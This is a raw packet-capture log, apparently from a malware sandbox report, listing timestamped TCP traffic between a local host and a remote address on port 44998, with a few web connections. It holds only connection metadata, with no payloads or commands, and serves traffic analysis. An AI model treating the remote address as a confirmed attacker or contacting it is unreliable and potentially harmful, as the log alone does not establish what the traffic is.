                            Jul 3, 2024 15:50:16.272711039 CEST8049739104.16.185.241192.168.11.20
                            Jul 3, 2024 15:50:16.288372040 CEST8049739104.16.185.241192.168.11.20
                            Jul 3, 2024 15:50:16.296922922 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:16.336608887 CEST4973980192.168.11.20104.16.185.241
                            Jul 3, 2024 15:50:16.648901939 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:16.649163961 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:17.005881071 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.415530920 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.415710926 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.415822029 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.415961981 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.415976048 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.415987968 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.415998936 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.416162014 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.416218042 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.416292906 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.416366100 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.416378975 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.416389942 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.416882038 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:27.416882038 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:27.683902025 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.724692106 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.724757910 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.724813938 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.724833965 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.724843025 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:27.724883080 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.724976063 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.724996090 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.725017071 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.725054026 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.725063086 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:27.725078106 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.725097895 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.725116014 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.725126982 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:27.725143909 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.725162983 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.725181103 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.725199938 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.725204945 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:27.725222111 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.725246906 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.725282907 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:27.725316048 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:27.725413084 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:27.725477934 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.032824993 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.032880068 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.032916069 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.032928944 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.032987118 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033142090 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.033322096 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033421993 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033453941 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033464909 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.033466101 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033478022 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033489943 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033502102 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033513069 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033524990 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033536911 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033549070 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033560991 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033571959 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033584118 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033601999 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033647060 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033704042 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033715963 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033732891 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033747911 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033762932 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033775091 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033786058 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033798933 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033809900 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033822060 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033833981 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033845901 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033857107 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033869028 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033880949 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033881903 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.033891916 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033904076 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033915997 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033930063 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.033984900 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.034115076 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.340810061 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.340830088 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.340858936 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.340872049 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.341001987 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.341017008 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.341034889 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.341300011 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.341311932 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.341387987 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.341478109 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.341607094 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.341675043 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.341896057 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.341978073 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342065096 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342077971 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342096090 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342108965 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342128038 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342139006 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342184067 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.342190027 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342200994 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342211962 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342252970 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342256069 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342256069 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342259884 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.342293978 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342304945 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342336893 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.342396975 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342407942 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342506886 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.342516899 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342571974 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342585087 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.342590094 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342601061 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342612982 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342623949 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342636108 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342645884 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342658043 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342668056 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342679977 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342690945 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342701912 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342713118 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342724085 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342735052 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342741013 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.342750072 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342761040 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.342869997 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.342921972 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.648900986 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.648942947 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.648964882 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.648986101 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.649087906 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.649149895 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.649171114 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.649204016 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.649333954 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.649379015 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.649631023 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.649703026 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.649844885 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.649981022 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.649995089 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650064945 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650104046 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650106907 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.650115967 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650126934 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650139093 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650165081 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650177002 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650193930 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650213957 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650233030 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650252104 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650260925 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.650264978 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650276899 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650403976 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.650424004 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650476933 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650548935 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650573015 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.650626898 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650640965 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650654078 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650665998 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650677919 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650690079 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650702000 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650712967 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650741100 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.650743961 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650758028 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650768042 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650779009 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650779963 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.650790930 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650803089 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650834084 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.650850058 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.650935888 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.692240953 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.956979990 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.957117081 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.957235098 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.957281113 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.957293987 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.957305908 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.957318068 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.957329988 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.957381010 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.957638979 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.957762003 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.957775116 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.957827091 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958070993 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958118916 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.958230972 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958242893 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958255053 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958267927 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958278894 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958291054 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958302975 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958313942 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958331108 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958343983 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958355904 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958368063 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958379030 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958389997 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958437920 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958445072 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.958492041 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958565950 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958616972 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.958617926 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958630085 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958642006 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958653927 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958679914 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958699942 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958717108 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.958719969 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958740950 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958756924 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:28.958807945 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.958950996 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:28.980365038 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:29.142141104 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.143141985 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:29.143313885 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:29.598447084 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:29.602632046 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.602801085 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:29.904004097 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.908970118 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.908987045 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909084082 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909161091 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909243107 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:29.909303904 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909317017 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909328938 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909367085 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909499884 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:29.909538031 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909567118 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909579039 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909588099 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909670115 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:29.909670115 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:29.992321014 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.992521048 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:30.278001070 CEST4974144998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:30.448465109 CEST4499849741147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:30.448684931 CEST4974144998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:30.893611908 CEST4499849741147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:31.321070910 CEST4974144998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:31.473373890 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:31.680020094 CEST4499849741147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:31.680170059 CEST4974144998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:31.822155952 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:31.822326899 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:32.041107893 CEST4499849741147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:32.130105972 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:32.131041050 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:32.479752064 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:32.479876995 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:32.841752052 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.355454922 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.355479002 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.355662107 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.357925892 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.357939005 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.604851007 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.605057955 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.606528997 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.606534958 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.606918097 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.644206047 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.688196898 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.731127024 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731244087 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731353045 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731395960 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.731590986 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731605053 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731698036 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731710911 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731723070 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731733084 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731743097 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731754065 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731838942 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.731880903 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731914043 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.731941938 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731954098 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731962919 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731973886 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731985092 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731996059 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732034922 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732045889 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732057095 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732068062 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732078075 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732089043 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732099056 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732126951 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732129097 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732131004 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732141018 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732147932 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.732151985 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732162952 CEST4499849735147.185.221.18192.168.11.20
